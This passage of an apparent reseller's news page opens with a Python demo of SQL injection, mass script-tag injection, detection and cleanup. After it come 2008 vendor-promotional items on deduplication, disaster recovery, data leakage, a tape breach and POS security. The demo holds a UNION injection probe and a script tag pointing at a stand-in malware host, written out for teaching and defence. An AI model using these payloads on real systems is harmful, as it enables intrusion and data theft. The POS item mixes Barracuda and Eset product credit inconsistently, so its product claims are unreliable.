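    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, secret TEXT)")
    conn.execute("INSERT INTO users (login, secret) VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """The pattern the article warns about: the browser-supplied value is spliced
    into the SQL text, so a quote inside `term` ends the literal and the rest of
    the value is parsed as SQL."""
    sql = "SELECT name FROM products WHERE name = '" + term + "'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, term):
    """Hardened form: the value is bound as a parameter and can only ever be
    compared against `name`, never parsed as SQL, whatever characters it holds."""
    rows = conn.execute("SELECT name FROM products WHERE name = ?", (term,))
    return [row[0] for row in rows]


def text_columns(conn):
    """Every (table, column) declared as a text type, read from the catalogue
    (names come from the schema, not from user input)."""
    cols = []
    for (table,) in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'"):
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if ctype.upper() in ("TEXT", "VARCHAR", "CHAR"):
                cols.append((table, name))
    return cols


def simulate_mass_injection(conn, tail):
    """Constructed stand-in for the mass attack: append the same HTML tail to every
    text column of every table, as the single hacked request described above does."""
    for table, col in text_columns(conn):
        conn.execute(f'UPDATE "{table}" SET "{col}" = "{col}" || ?', (tail,))
    conn.commit()


def find_injected(conn):
    """Detection: (table, column, rowid) of every text value carrying a script tag."""
    hits = []
    for table, col in text_columns(conn):
        for rowid, value in conn.execute(f'SELECT rowid, "{col}" FROM "{table}"'):
            if value is not None and SCRIPT_TAG_RE.search(value):
                hits.append((table, col, rowid))
    return hits


def clean_injected(conn):
    """Cleanup: strip the injected tag from each hit and return how many were cleaned.
    Only the tail is removed, so the original value survives as long as the field
    did not truncate it (SQLite never truncates; a fixed-width varchar(n) would,
    which is why a backup from before the attack is the safer recovery)."""
    hits = find_injected(conn)
    for table, col, rowid in hits:
        (value,) = conn.execute(
            f'SELECT "{col}" FROM "{table}" WHERE rowid = ?', (rowid,)
        ).fetchone()
        conn.execute(
            f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
            (SCRIPT_TAG_RE.sub("", value), rowid),
        )
    conn.commit()
    return len(hits)


if __name__ == "__main__":
    db = make_db()
    probe = "x' UNION SELECT secret FROM users --"  # constructed probe string
    print("vulnerable   :", search_vulnerable(db, probe))     # leaks the users row
    print("parameterized:", search_parameterized(db, probe))  # [] : no such product
    simulate_mass_injection(db, '<script src="http://malware.example/x.js"></script>')
    print("injected cells:", find_injected(db))
    print("cleaned:", clean_injected(db), "remaining:", find_injected(db))
```

Running the script prints the secret from the concatenated query and an empty list from the bound one, then reports six injected cells (two text columns in each of two product rows plus two in the user row), cleans them, and finds none left.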
WILL WE EVER CATCH THESE GUYS
Maybe not, but in the meantime the Barracuda Web Site Firewall is a complete and powerful security solution for Web applications and Web sites. The Barracuda Web Site Firewall provides award-winning protection against hackers leveraging protocol or application vulnerabilities to instigate data theft, denial of service or defacement of your Web site.
For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/products-security.php
Magic Quadrant Leader -- Quantum DXi 7500 Now Shipping - July 21, 2008
Orlando Florida -- Quantum Corp. is rolling out its third-generation DXi7500 data deduplication system to give it a smaller entry point and to make it easier to manage in the wake of increased competition in the data deduplication market.
The DXi7500 is the flagship of Quantum's data deduplication family, and it finally hit the market in June – 11 months after Quantum announced it. Quantum today rolled out a management application called Quantum Vision and a DXi7500 configuration that starts at 9 TB of usable data. The DXi7500 previously started at 18 TB. The high end remains at 180 TB of usable data (240 TB raw).
The major feature of the DXi7500 enterprise disk backup platform is that it gives customers a choice to dedupe data inline (while writing to disk) or post process (after writing to disk). Quantum refers to the methods as adaptive (inline) and deferred (post process). Its smaller data deduplication appliances, the DXi3500 and DXi5500, only perform post-process deduplication, and competing deduplication products support one or the other deduplication method. "No other vendor offers this technology, and it was the key reason we stopped marketing the Data Domain DDX series, along with their low performance and lack of expandability," says Brian McCarthy, President of Sencilo Solutions. Up until late last year Sencilo was one of Data Domain's largest resellers, says McCarthy.
Quantum recommends adaptive deduplication to back up small offices, virtual servers and mailboxes, and deferred deduplication to back up applications with large amounts of new data or large OLAP databases.
Today's upgrades come as Quantum tries to carve a place for itself in a crowded data deduplication market. When Quantum rolled out the DXi3500 and DXi5500 in early 2007, Data Domain was the only major dedupe target competition. Now, EMC, IBM, Hewlett-Packard, FalconStor, Sun, Hitachi Data Systems, Sepaton, Copan, Exagrid, Overland and NEC all have data deduplication backup products through their own IP or partnerships. NetApp offers dedupe as part of its operating system for primary data, and industry sources say it is close to bringing out deduplication for its virtual tape library (VTL) products.
Quantum even competes with its own data dedupe code because EMC licenses it to run on EMC disk libraries.
"There's more competition and the stakes are higher now," said analyst Brian Garrett, Enterprise Strategy Group. "Quantum's been at it for a while, and they've learned a lot of lessons."
Quantum hasn't had much success with its data deduplication products yet, and the management interface received complaints from customers. But the Vision console includes GUIs showing performance and capacity trends, historic and current dedupe ratios, replication status, and monitoring and usage reports for arrays and tape libraries, network switches and backup applications. Along with the DXi devices, Vision shows information on Quantum's tape and nondedupe disk systems on the same console.
"We haven't had a single tool that lets you see multiple systems," said Steven Whitner, Quantum's product marketing manager for disk systems.
Vision is the more interesting of today's releases, Garrett said. "Their trending stuff is really rich. Just showing dedupe rates over time is a key value. That's conspicuously absent from dedupe products," he said. "They do a good job of reporting on how it's going right now, but what about last week at this time? How much am I saving over time?"
As for the smaller DXi7500, Whitner pointed out the DXi5500 maxes out at 11 TB of usable data and there was a gap between that and the previous smallest DXi7500. "This is a way of keeping the whole product line smoothly scalable," he said.
Pricing for the 9 TB DXi7500 begins at $95,000 for NAS and data deduplication licenses, and Quantum Vision starts at $7,500 for a two-system license. This is half the price of a similar Data Domain DD595.
For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/storage-data-deduplication.php
Cost Cutting Tips and Tricks for DR Plans - July 18, 2008
Orlando Florida -- In these days of extremely tight budgets and ever-increasing energy and transportation costs, who would waste money? You have to look at your spending from various angles to see where you may have wasted dollars. For example, refusing to spend money on technologies that can reduce your disaster recovery (DR) deployment and testing costs actually wastes money. This is the first of the top DR budget wasters discussed in this tip.
Not virtualizing your data center: Virtualization can save you money in DR maintenance and testing. "I have talked to many customers who have leveraged virtualization to build DR solutions, even with applications that are not readily consolidated. In other words, they have implemented a 1:1 consolidation ratio just to gain the benefits of virtualization's mobility to simplify DR," says Brian McCarthy, President and enterprise-class VMware consultant in Lake Mary, Florida.
Consolidated virtual infrastructures can save even more money. Let's look at a real life example from a CIO of a medium sized business I spoke with. Like many companies diving into virtualization, they had virtualized the bulk of their applications and services in order to gain the benefits of consolidation. The CIO had not thought that he would see any additional savings and was very pleasantly surprised to see a dramatic reduction in DR testing time and personnel.
Before they virtualized, their DR tests (performed twice a year) would take three to five days to complete with seven to 10 IT staff involved. After virtualizing, the testing time dropped to one to two days and used only two IT staff. How much money does this save? Assume that a fully burdened IT engineer costs $175,000 per year and works 260 days per year. Best case savings for this company (10 staff for five days twice a year down to two staff for one day twice a year) is $64,616 per year and that does not include opportunity costs -- the work that was not being done by the extra IT staff that was busy performing the DR testing tasks. To be fair, let's look at the worst case savings (seven staff for three days twice a year down to two staff for two days twice a year) that would still be a savings of $22,884 per year. Bottom line: Leverage virtualization to avoid wasting money on DR testing.
Not maintaining your DR plan: You have spent considerable time and money on your business continuity plan. You have the plan implemented, or so you think. You have performed an initial test or two. But business needs and tightening budgets drive you down the path of justifying putting off the next DR test until the current critical project is completed. By the time that project is mostly completed, the next critical project is looming over your head. Again, you delay your DR testing to focus on meeting the demands of the business. This vicious cycle continues and continues. Does this sound familiar?
I've seen this too many times, even in large mature IT organizations. Putting off your plan maintenance and testing means that you spent your initial DR investment in vain. You wasted all that money -- thousands to millions of dollars. Without ongoing testing and maintenance, history has proven time and time again that recovery is bound to fail, or at least take longer than expected as the staff wades through hundreds of small issues that would have been resolved through regular plan testing and maintenance. Bottom line: Maintaining and testing your plan is a critical project; without maintenance, any money spent on DR previously is mostly wasted.
Lack of CEO oversight and board involvement: I've heard too many stories where business continuity and DR is driven from the CIO and not the CEO. All of the companies that have experienced a disaster where the DR plan was driven by the CIO have had one thing in common: The IT department is up and running, but the rest of the business is broken and in a disaster state.
DR and business continuity are the safety nets for the health of the whole company, not just the IT department. DR planning, testing, and maintenance should be driven by the CEO and board of directors as a top priority. It represents protecting all corporate assets. When DR is not being driven by the CEO, all the money and time spent on DR by the CIO is in vain. It is wasted as the overall corporation remains in a non-functional state in the event of a disaster.
On the bright side, I talked to a CIO who had a CEO that drove DR across their company (a large distributor with five warehouses and a central data center). This CIO wasn't that excited about DR personally, but kept the plan going as a result of the CEO's continued vigilance. When Internet communications were cut to the central data center by an impatient back-hoe operator, the plan operated within parameters so that orders did get out by their deadlines. Some minor issues with the plan were discovered and repaired, and in the post mortem, it was determined that the plan worked. It had included the whole company, and it was the business units and employees that kept the business running while the data center was off-line. Bottom line: DR and business continuity are only effective if driven by the CEO and board of directors across the whole company. "Any money spent on DR for IT alone without DR for the rest of the company is wasted," says McCarthy.
Over protecting your environment: I have not seen this sin committed as often as the preceding mistakes, but I have seen it nonetheless. Executives tend to believe every service and component is critical and needs protecting at top levels -- especially at companies new to building business continuity plans. Handing them the bill for what they are asking usually brings a level of sanity back to the business unit head.
I have seen companies implement a recovery data center with site-to-site replication and hot, ready-to-go servers. They place all their services and applications into the hot site system regardless of system criticality. As a result, they protect systems at high costs that require much less aggressive protection at much lower costs (e.g., simple weekly tape backup stored off-site).
A detailed business analysis of each system can avoid such mistakes. Let's look at a slightly different example that can illustrate this point. I talked to the CIO of a large enterprise and he shared an interesting story. The sales division came to him asking for a customer account licensing tracking system for a very special class of customer. The company offered various levels of product licensing with the bulk of their millions of customers buying their standard product. The standard product license was already automated in an account tracking database system. This special class of customer license had some specific needs that could not be met by the general system.
The CIO put out RFPs and received proposals to retro-fit or add a completely new system with redundancy and protection for $2 million to $3 million. Then he asked the sales division how many customers are in this special case, and learned that it was currently about 400 customers. He then asked how fast that special licensing customer group was growing and what they expected it would be in three years. The answer: maybe ten percent in three years.
Armed with that business information, the CIO proceeded to purchase two locking steel file cabinets and hire two administrative assistants to manually track these customers. He arranged with the corporate records office to have copies of each customer record securely shipped to the corporate off-site archives for data protection and business continuity. The savings were between $1.5 million and $2.5 million. Bottom line: Look at the business aspects of what you are doing. Spending money on aggressive DR for all business processes may be wasting money.
For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/continuity-disaster.php
What Cisco isn't telling us about VoIP and data leakage - July 17, 2008
Orlando Florida -- Large software and infrastructure vendors have been pushing companies toward unified communications (UC), but many firms are viewing UC as another avenue for data leakage, according to a recent survey conducted by Black Diamond, Wash.-based Osterman Research Inc.
"Some firms are shopping for data leakage prevention tools as part of their unified communications projects. Many fear that sensitive company data could be difficult to control when email, Voice over Internet Protocol (VoIP) and instant messages meld with collaboration systems, multimedia services and transactional systems," says Brian McCarthy, President and well-known security consultant for Sencilo Solutions, Lake Mary, Florida.
Nearly 50% of respondents are concerned about information leak prevention in their current or planned unified communications implementations, and 23% of those view leak prevention as a top priority, according to an online survey of 109 mid-to-large IT organizations in North America, conducted last month by Osterman Research.
"The major vendors are really pushing that UC message, and I think companies are starting to respond and understand that UC is a good thing, but it creates even more opportunities for data leaks," said Michael Osterman, president and principal analyst at Osterman Research.
The survey was commissioned by Belmont, Calif.-based messaging security vendor FaceTime Communications Inc.
IT pros fear a number of threats posed by melding communications onto one common data network. An attacker can intercept VoIP, instant messaging (IM) and other traffic, or worse, they can conduct a distributed denial-of-service (DDoS) attack by using a VoIP protocol to flood systems with session requests. Others fear an increase in vishing, the VoIP-enabled form of phishing.
But the risk of those forms of attack is minimal, Osterman said. Insider threats from unintentional or accidental leaks pose a greater threat, he said, and the survey suggests that IT organizations are heeding that message. Forty-eight percent of respondents view unintentional or accidental leaks of information by employees as a serious concern, as compared with 31% who named data loss due to malicious software as a serious concern.
Osterman said he's still seeing companies willing to accept the risks involved with UC rather than being proactive by implementing technologies or sound security policies. For example, a consultant couldn't convince a company to implement an email archiving system. The firm decided to pay fines instead.
Companies need to begin with the basics and develop a multi-layer defense strategy, Osterman said. Companies can implement portions of a data leakage prevention system by focusing on the data governing rules outlined by their industry. For example, a merchant can implement a system that monitors all outbound email and IM for 16-digit character strings.
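The outbound-message check described above, as an added example that is not part of the original article: it scans constructed sample email and IM messages for 16-digit card-number-like strings and, going one step beyond the text, applies a Luhn checksum so that order numbers and other 16-digit values do not trigger a block. Message contents and the Luhn step are assumptions for illustration.

```python
import re
from typing import Dict, List

# Candidate PAN: 16 digits, optionally separated by spaces or dashes
# (e.g. 4-4-4-4 groups). The lookarounds keep a 17-digit run from matching.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){15}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 checksum used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_message(text: str) -> List[Dict[str, object]]:
    """Return every 16-digit candidate with its Luhn result and a masked form."""
    findings = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        findings.append({
            "match": m.group(0),
            "luhn_valid": luhn_ok(digits),
            "masked": "*" * 12 + digits[-4:],   # safe to write to a DLP log
        })
    return findings


def should_block(text: str) -> bool:
    """Block only when a candidate also passes the Luhn check."""
    return any(f["luhn_valid"] for f in scan_message(text))


# Constructed sample traffic; 4111... is a widely used test card number.
SAMPLE_MESSAGES = {
    "im_1": "customer card is 4111 1111 1111 1111 exp 12/11, pls process",
    "email_1": "Order 1234567890123456 shipped this morning.",
    "email_2": "Ref 12345678901234567 is the 17-digit tracking id.",
}

if __name__ == "__main__":
    for name, body in SAMPLE_MESSAGES.items():
        print(name, "BLOCK" if should_block(body) else "allow", scan_message(body))
```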
"We're starting to find organizations that are at least thinking about the issues, but there are a lot of companies that don't realize the negative ramifications of what they're doing," he said.
For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/security-compliance-management.php
Sencilo Solutions is a Florida-based integrator specializing in network storage and information security solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, EMC, RSA, Juniper Networks, Hitachi, Symantec, Barracuda Networks, and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, installation, maintenance and knowledge transfer.
Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Kissimmee, Lakeland, Maitland, Cape Canaveral, Lake Mary
University of Utah lost 2.2 million Health Care and Social Security Records - June 26, 2008
Courier violated protocol, taking data home instead of directly to off-site storage facility
Orlando, Florida -- University of Utah officials this week acknowledged that a metal box of backup tapes containing billing records of some 2.2 million patients was stolen early this month from the car of a courier who left it in a parked car overnight outside his home.
The missing tapes were taken on June 2 from the car of an employee of Perpetual Storage Inc., an independent storage company hired by the university to transport its computer tapes to off-site facilities, said school officials. The tapes contained names, demographic information and Social Security numbers of patients of the University of Utah Hospitals & Clinics.
The health care system has suspended all backup tape deliveries to Perpetual Storage pending a full review of the company's protocols and procedures, said a university spokeswoman.
The spokeswoman confirmed that Perpetual Storage fired the individual involved with the data breach for violating company data security transportation protocols. The driver had been employed by Perpetual Storage for 18 years, she said.
The spokeswoman said the driver informed his employer immediately upon discovering that the tapes were lost. Perpetual Storage informed the University of Utah Hospitals & Clinics officials within 24 hours of the breach, she added.
Perpetual Storage did not immediately return calls by Computerworld seeking comment.
The university spokeswoman declined to say whether any of the missing data storage tapes were encrypted.
Lorris Betz, senior vice president for health sciences and CEO of University of Utah Health & Clinics, said in a posted alert that it's unlikely that any information on the backup tapes will be exposed to thieves. "Although it is unlikely that information on the tapes will be compromised, we are nevertheless taking aggressive steps to protect our patients' confidentiality," Betz said in the post. "Not true," says Brian McCarthy, president of Sencilo Solutions and well-known speaker on backup and security. "If their tapes do not contain encryption, anyone with a tape drive can read the files."
The university plans to mail notification letters to all patients whose data was held on the stolen tapes and offer them free credit-monitoring services. The missing tapes did not hold any credit card information, noted school officials.
The university is offering a reward of $1,000 for the return of the stolen tapes with "no questions asked." The Salt Lake County Sheriff's Department, the FBI and U.S. Postal Service are investigating the theft.
Where will it end? PCI compliance now extends to POS car washes, quick lubes - June 17, 2008
When Innive Systems, Inc., began integrating credit card clearing into its point-of-sale systems for car washes by connecting to a credit card clearinghouse over the Internet, executives at the company knew they had to do something to protect the machines.
At first, they advised their customers to install antivirus software. But over time, it became clear the customers weren't heeding their advice: Support calls soared as machines became infected with viruses and other malware. The outbreaks would prevent the vendor's POS applications, which are integrated with the car wash tunnel operations, from running and disrupt business. Support technicians spent hours cleaning up customers' systems.
"It really led us to look at the fact that they weren't being proactive in protecting themselves, so we had to look for a solution," said Joe Jennings, network administrator at Daytona Beach, Florida-based Innive Systems.
The company began looking for software that would work with its application and provide affordable protection for its customers. Jennings and his team put seven antivirus products to the test on a POS system. They threw viruses and spyware at each, and looked at how fast they allowed the Innive Systems application to run.
"We went through the entire gamut with each one," Jennings said.
In the POS world, anything that slows down the ability to produce a receipt is unacceptable, he explained. "You don't want customers standing there waiting for anything." In that respect, Barracuda Antivirus stood out from the others. With it, a receipt popped out in less than half a second. CA's antivirus caused the longest lag at 20 seconds, Jennings said.
Jennings and his team also liked Barracuda's proactive capabilities in blocking malware, its integrated anti-spyware protection, Eset's automatic updates, and its low price. The initial plan was to resell the antivirus protection to customers, but with the PCI Data Security Standard becoming a concern, the company's president decided that it needed to be included with every POS system, Jennings said.
By including the antivirus protection with its systems, Innive Systems is helping its customers at nearly 3,000 car wash and quick lube locations comply with the PCI standard, Jennings said. Barracuda, which is installed with the POS server in active scanning mode for real-time protection, prevents viruses, Trojans or other malware from reading or extracting any of the data flowing from the POS device and server to the credit card clearinghouse, he said. No credit card data is stored on the POS device or server, he added.
The need to secure POS systems was highlighted in the recent indictment of three men on charges of hacking into computer systems at 11 Dave & Buster's restaurants and stealing credit and debit card numbers. The trio allegedly gained unauthorized access to the POS servers at each restaurant and installed packet sniffers designed to capture credit card data.
Security expert Brian McCarthy of Sencilo Solutions in Longwood, Florida has said, "A common security problem at retail locations is POS systems that are managed by third parties via unsecured remote access systems that often use blank or default passwords."
In addition to providing antivirus protection with its POS solutions, Innive Systems ships to each customer a router that's configured securely, without any standard open ports. And even before PCI compliance became an issue, the company realized it needed to replace its remote support solution for managing client machines with a more secure system, Jennings said. It chose the Bomgar Box, which he described as a secure, encrypted point-to-point system; no standard passwords are used and Jennings requires frequent password changes for employees.
In addition, Innive Systems is working to get its software validated under the new Payment Application Data Security Standard (PA-DSS), which is based largely on Visa's Payment Application Best Practices (PABP) program.
Since the vendor started shipping every system with Barracuda, calls to its support team about viruses and other problems have dropped tremendously, Jennings said. The company also replaced the Symantec and Webroot Software antivirus products on its corporate network with the same antivirus product.